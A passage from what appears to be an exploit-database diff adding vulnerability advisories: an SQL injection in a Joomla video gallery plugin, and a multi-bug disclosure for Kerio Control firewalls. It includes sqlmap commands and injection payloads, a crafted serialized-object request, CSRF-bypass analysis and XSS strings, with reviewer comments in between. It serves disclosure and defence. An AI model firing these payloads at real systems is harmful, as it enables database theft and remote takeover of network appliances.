CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +September 09, 2016 1: Initial release +September 20, 2016 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +September 09, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas +September 09, 2016 2: Send to vendor +September 12, 2016 3: Vendor fix vulnerability +September 20, 2016 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester diff --git a/platforms/php/webapps/40413.txt b/platforms/php/webapps/40413.txt new file mode 100755 index 000000000..ab446c468 --- /dev/null +++ b/platforms/php/webapps/40413.txt 
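Review bot: The affected-range and fix statements do not line up: section VI gives `Exponent CMS <= v2.3.9`, yet the only remediation pointer in section VII is a news item named for patches to v2.1.4 and v2.2.3, and no first-fixed version is stated; naming the fixed release (or patch identifier) explicitly would let readers confirm they are out of scope. Section III says HTTP/1.0 must be used to reach the injection but not why; a sentence on what differs in the 1.0 request handling would let defenders write a precise rule rather than matching on `index.php'` alone. The discoverer's name is mis-encoded twice (`Manuel GarcAa CA!rdenas`), apparently a Latin-1/UTF-8 mix-up in the submitted file, and the CVSS score uses a decimal comma (`7,1/10`) that tooling will not parse.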
@@ -0,0 +1,76 @@ +Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla +Author: Larry W. Cashdollar, @_larry0 +Date: 2016-09-15 +Download Site: http://huge-it.com/joomla-video-gallery/ +Vendor: www.huge-it.com, fixed v1.1.0 +Vendor Notified: 2016-09-17 +Vendor Contact: info@huge-it.com +Description: A video slideshow gallery. +Vulnerability: +The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. + +Vulnerable Code in : ajax_url.php + + 11 define('_JEXEC',1); + 12 defined('_JEXEC') or die('Restircted access'); +. +. +. + 28 if($_POST['task']=="load_videos_content"){ + 29 + 30 $page = 1; + 31 + 32 + 33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){ + 34 $paramssld=''; + 35 $db5 = JFactory::getDBO(); + 36 $query5 = $db->getQuery(true); + 37 $query5->select('*'); + 38 $query5->from('#__huge_it_videogallery_params'); + 39 $db->setQuery($query5); + 40 $options_params = $db5->loadObjectList(); + 41 foreach ($options_params as $rowpar) { + 42 $key = $rowpar->name; + 43 $value = $rowpar->value; + 44 $paramssld[$key] = $value; + 45 } + 46 $page = $_POST["page"]; + 47 $num=$_POST['perpage']; + 48 $start = $page * $num - $num; + 49 $idofgallery=$_POST['galleryid']; + 50 + 51 $query = $db->getQuery(true); + 52 $query->select('*'); + 53 $query->from('#__huge_it_videogallery_videos'); + 54 $query->where('videogallery_id ='.$idofgallery); + 55 $query ->order('#__huge_it_videogallery_videos.ordering asc'); + 56 $db->setQuery($query,$start,$num); + +CVE-2016-1000123 +Exploit Code: + aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3 + aC/ . + aC/ . + aC/ . + aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] + aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: + aC/ --- + aC/ Parameter: #1* ((custom) POST) + aC/ Type: error-based + aC/ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) + aC/ Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2 + aC/ + aC/ Type: AND/OR time-based blind + aC/ Title: MySQL >= 5.0.12 time-based blind - Parameter replace + aC/ Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2 + aC/ --- + aC/ [19:36:55] [INFO] the back-end DBMS is MySQL + aC/ web server operating system: Linux Debian 8.0 (jessie) + aC/ web application technology: Apache 2.4.10 + aC/ back-end DBMS: MySQL >= 5.0.12 + aC/ [19:36:55] [WARNING] HTTP error codes detected during run: + aC/ 500 (Internal Server Error) - 2714 times + aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' + aC/ + aC/ [*] shutting down at 19:36:55 +Advisory: http://www.vapidlabs.com/advisory.php?v=169 \ No newline at end of file diff --git a/platforms/php/webapps/40414.txt b/platforms/php/webapps/40414.txt new file mode 100755 index 000000000..462371638 --- /dev/null +++ b/platforms/php/webapps/40414.txt 
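Review bot: The quoted vendor code shows more unvalidated input reaching the query than the advisory names: besides `$idofgallery` being concatenated into the WHERE clause on line 54, `$num=$_POST['perpage']` (line 47) flows unchecked into the `$start` arithmetic on line 48 and into `$db->setQuery($query,$start,$num)` on line 56, while only `page` receives the `is_numeric` guard on line 33. The advisory should list `perpage` alongside `galleryid` so anyone writing a filter rule or verifying the v1.1.0 fix checks both; the vendor-side fix is to cast both to integers (`(int) $_POST['galleryid']`, `(int) $_POST['perpage']`) or bind them through the Joomla query API instead of string concatenation. Line 11's `define('_JEXEC',1);` immediately satisfies the `defined('_JEXEC') or die(...)` guard on line 12, which is why the script is callable directly and is the root cause of the "unauthenticated" in the title — worth stating explicitly.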
@@ -0,0 +1,507 @@
+SEC Consult has also released a blog post describing the attack scenarios
+of the vulnerabilities within this advisory in detail and a video which
+shows the remote attack. Exploit code has been developed as well but will
+not be released for now.
+
+Blog:
+http://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html
+
+Video:
+https://www.youtube.com/watch?v=y_OWz25sHMI
+
+
+SEC Consult Vulnerability Lab Security Advisory < 20160922-0 >
+=======================================================================
+ title: Potential backdoor access through multiple vulnerabilities
+ product: Kerio Control Unified Threat Management
+ vulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1
+ build 1324
+ fixed version: 9.1.3 (partially fixed, see vendor statement below)
+ CVE number: -
+ impact: critical
+ homepage: http://www.kerio.com/
+ found: 2016-08-24
+ by: R. Freingruber (Office Vienna)
+ R. Tavakoli (Office Vienna)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Bangkok - Berlin - Linz - Montreal - Moscow
+ Singapore - Vienna (HQ) - Vilnius - Zurich
+
+ https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"Protect your network from viruses, malware and malicious activity
+with Kerio Control, the easy-to-administer yet powerful all-in-one
+security solution.
+Kerio Control brings together next-generation firewall capabilities -
+including a network firewall and router, intrusion detection and
+prevention (IPS), gateway anti-virus, VPN, and web contentand
+application filtering. These comprehensive capabilities and unmatched
+deployment flexibility make Kerio Control the ideal choice for small
+and mid-sized businesses." 
+
+Source: http://www.kerio.com/products/kerio-control
+
+
+Business recommendation:
+------------------------
+By combining the vulnerabilities documented in this advisory an attacker
+can fully compromise a network which uses the Kerio Control appliance for
+protection.
+
+The attacker can trick a victim to visit a malicious website which then conducts
+the internal attack. The attacked victim must be logged in or weak credentials
+must be configured which can be found with a bruteforce attack.
+
+The attacker will gain a reverse root shell from the Internet to the internal
+Kerio Control firewall system. Moreover, it's possible that an internal attacker
+uses the described vulnerabilities to escalate his privileges (low privileged
+account to full root shell) to steal credentials from other users on the UTM
+appliance.
+
+Most vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found
+in just two PHP scripts. Both scripts are not referenced by any other
+PHP script nor by any binary on the system.
+Both scripts contain a different(!), seemingly deliberate(?) CSRF bypass
+which make the vulnerabilities exploitable from the Internet to obtain a
+reverse root shell.
+
+SEC Consult recommends not to use Kerio Control until a thorough security
+review has been performed by security professionals and all identified
+issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
+ to remote-code-execution
+An authenticated user (standard user or administrator) can control data, which
+gets later unserialized. Kerio Control uses PHP 5.2.13 which was released on
+2010-02-25. This version is more than 6 years old and several bugs were found
+in the meantime within the unserialize function. 
The following CVE numbers
+are just some examples for vulnerabilities in unserialize which lead to remote
+code execution:
+ -) CVE-2014-8142
+ -) CVE-2014-3515
+ -) CVE-2015-0231
+ -) CVE-2015-6834
+ -) CVE-2016-5771
+ -) CVE-2016-5773
+
+PHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a
+type confusion attack to trigger a use-after-free vulnerability. It can be used
+to read data and get full code execution. In the case of Kerio Control the
+result of unserialize is not reflected back to the attacker. It's therefore not
+possible to read memory from the stack or heap (e.g. to bypass ASLR).
+
+Nevertheless, SEC Consult developed a fully working and reliable (blind) exploit
+for this vulnerability which spawns a reverse root shell to the Kerio Control
+system.
+For this exploit a user account is required. However, it's also possible to
+conduct the attack via the Internet because the CSRF (Cross Site Request
+Forgery) check can be bypassed (see below).
+
+An attacker can use this vulnerability to break into a company network via the
+Internet by tricking a logged in user to visit a malicious website. Even if the
+user is currently not logged in the attacker can start a bruteforce attack to
+obtain valid credentials to conduct the attack.
+
+
+2) PHP script allows heap spraying
+One of the PHP scripts allows the allocation of memory inside the main binary
+(winroute) of Kerio Control. Winroute contains the code of most services
+(e.g. the webserver, PHP, network related functionality, ...).
+The memory will not be freed after finishing the request and can therefore be
+used to spray payloads to the whole memory space.
+
+This vulnerability was used in the overall exploit to defeat ASLR.
+Please bear in mind that it's very likely that an attacker can write a working
+exploit without heap spraying. Fixing this vulnerability would therefore not
+prevent the exploitation of the remote code execution vulnerability. 
+For example, the information disclosure vulnerability from this advisory can
+be used to bypass ASLR as well. This would eliminate the need of heap spraying.
+
+
+3) CSRF Protection Bypass
+The PHP scripts contain code to protect against CSRF (Cross Site Request
+Forgery) attacks. Because of the wrong usage of PHP binary
+operations and comparisons it's possible to bypass this check. That means
+that an attacker can trigger requests from other websites which will be handled
+by Kerio Control. This vulnerability allows to exploit the remote code
+execution vulnerability from the Internet to break into a network.
+
+
+4) Webserver running with root privileges
+The main binary (which contains the webserver and PHP) runs with root
+privileges.
+
+Kerio told SEC Consult that this vulnerability will not be fixed. SEC
+Consult strongly recommended otherwise.
+
+
+5) Reflected Cross Site Scripting (XSS)
+Kerio Control does not properly encode parameters which are reflected on the
+website. This leads to cross site scripting vulnerabilities.
+An attacker can abuse these vulnerabilities to modify the website or do actions
+in the context of the attacked user.
+
+
+6) Missing memory corruption protections
+The main binary (winroute) is not compiled as position-independent executable
+(PIE). This allowed the use of ROP (return-oriented-programming) code to
+bypass the not executable heap. Moreover, the stack is per default marked as
+executable, but the exact location of the stack is randomized by ASLR.
+
+
+7) Information Disclosure leads to ASLR bypass
+One of the PHP scripts leaks pointers to the stack and heap.
+This can be abused by attackers to bypass ASLR.
+Because stacks are marked as executable an attacker can therefore easily bypass
+ASLR and DEP/NX.
+
+
+8) Remote Code Execution as administrator
+Nearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code
+execution vulnerability in the administrative web interface in the upgrade
+functionality. 
This vulnerability is still unfixed, only the associated XSS
+vulnerability was fixed. However, an attacker can still exploit it from the
+Internet, e.g. by abusing the XSS vulnerability described in this advisory
+(where the CSRF check can be bypassed).
+
+With this vulnerability an attacker can gain a reverse root shell on
+Kerio Control again if a logged in administrator visits a malicious website
+on the Internet.
+More information can also be found in the old advisory:
+https://www.exploit-db.com/exploits/38450/
+
+
+9) Login not protected against brute-force attacks
+There are no bruteforce protections in place for the login.
+If an unauthenticated victim visits an attacker's website, the attacker can
+start a bruteforce attack to obtain valid credentials to execute the
+remote code execution exploit. Via image-loading the attacker can detect if
+the current credentials are valid (without violating SOP).
+
+
+Proof of concept:
+-----------------
+1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
+ to remote-code-execution
+The following request can be used to set the unserialize data. In this example
+a faked string is used which points to 0xffffffff (kernel memory). Unserializing
+it will therefore crash the remote webserver (the winroute process). 
+
+POST /set.php HTTP/1.1
+Host: $IP:4081
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Cookie: SESSION_CONTROL_WEBIFACE=;
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 730
+
+k_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:"k_dbName";s:5:"error";s:11:"k_dbSummara";s:3:"abc";s:14:"k_dbIndividual";s:3:"abc";s:16:"k_dbLastUsedType";s:3:"abc";s:10:"k_dbLayout";s:3:"abc";s:10:"k_pageType";s:3:"abc";s:13:"k_periodStart";i:123;s:11:"k_periodEnd";i:123;s:8:"k_userId";i:123;s:6:"tabBar";i:123;s:13:"k_gotoElement";i:123;s:9:"k_protoId";i:123;s:11:"k_errorType";i:123;s:16:"k_timezoneOffset";i:123;s:9:"k_groupId";i:123;s:2:"id";i:123;s:11:"k_dbSummary";C:16:"SplObjectStorage":152:{x:i:2;O:8:"stdClass":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:"\ff\ff\ff\ff\20\00\00\00\01\00\00\00\06\00\00";i:1;R:3;}}s:18:"k_historyTimestamp";s:3:"abc";}
+
+The following request will call unserialize on the injected data:
+
+GET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1
+Host: $IP:4081
+Cookie: SESSION_CONTROL_WEBIFACE=;
+Connection: close
+
+In the example above only a denial of service will be conducted. However, an
+attacker can change the data type to object to get full code execution on
+the remote system.
+
+SEC Consult developed a fully working exploit for this attack which spawns a
+root shell. Please note that this exploit was intentionally written to just
+target Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets
+are used which belong to the winroute binary with the SHA256 hash:
+2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0
+This exploit will not be released for now.
+
+A real-world-attacker can detect the remote binary version by bruteforcing
+the object handler related to CVE-2014-3515. 
+
+
+2) PHP script allows heap spraying
+The set.php script contains the following code:
+$p_variable = urldecode($_POST['k_variable']);
+$p_value = urldecode($_POST['k_value']);
+...
+$p_session->setSessionVariable($p_variable, $p_value);
+
+POST requests with the following parameters can therefore be used to allocate
+space on the remote system:
+k_securityHash=x&target=k_sessionVariable&k_variable=
+&k_value=
+
+During tests it was possible to spray approximately 400 MB data in 30 seconds
+which is enough to control two predictable addresses on the heap.
+
+
+3) CSRF Protection Bypass
+Two scripts are required for the remote code execution exploit:
+ -) set.php
+ -) ContentLoader.php
+Both scripts contain different very interesting CSRF check bypasses.
+
+The following code can be found in set.php:
+$p_session->getCsrfToken(&$p_securityHash);
+$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash'];
+if ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) {
+exit();
+}
+
+Since the programming language is PHP (and not JavaScript), the above code code
+does not work as expected. $p_postedHash can only become 0 or 1 because || is a
+logical operator. The if-condition compares the valid token with the posted one
+via the != operator, however, this will not check if types are the same.
+If k_securityHash is set (either via GET or POST) to any value, the above code
+will compare the number 1 with a string, which will always bypass the check.
+It's therefore enough to set k_securityHash to any value to bypass the CSRF
+protection.
+
+The following code can be found in contentLoader.php:
+$p_session->getCsrfToken(&$p_securityHash);
+$p_postedHash = $_GET['k_securityHash'];
+... 
+if (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) {
+$p_page = new p_Page();
+$p_page->p_jsCode('window.top.location = "index.php";');
+$p_page->p_showPageCode();
+die();
+}
+
+Now the programmers only use the GET parameter, however, they changed the
+logical operator in the if condition from || to && which means that the CSRF
+check will only be applied if $p_postedHash is empty. It's therefore again
+enough to set k_securityHash to any value to bypass the check.
+
+
+4) Webserver running with root privileges
+No proof of concept necessary.
+
+
+5) Reflected Cross Site Scripting (XSS)
+In the following request the k_historyTimestamp parameter is prone to XSS:
+https://:4081/contentLoader.php?k_dbName=x&k_securityHash=x
+&k_historyTimestamp=aa%22;alert(1)%3b//
+
+In the same request the id parameter can be used to inject JavaScript code.
+Note that the attack can only be conducted against administrative users.
+Users with standard privileges can only access pages with k_dbName set to one
+of the following values:
+ -) accStats
+ -) prefs
+ -) dialup
+ -) error
+
+In such a case Kerio Control adds code like the following
+(in this example k_dbName=dialup):
+var k_newDbName = "";
+
+The " characters within the string are not correctly encoded.
+This will lead to the termination of the JavaScript execution. Because the
+injected payload is stored after this code, the attacker must bypass this
+code to ensure that the payload gets executed. This is only possible if
+the attacked user is an administrator because administrators can load any
+dbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like
+the following will be added instead (which does not crash):
+var k_newDbName = "";
+
+Another XSS can be found at:
+https://:4081/admin/internal/dologin.php?hash=%0D%0A">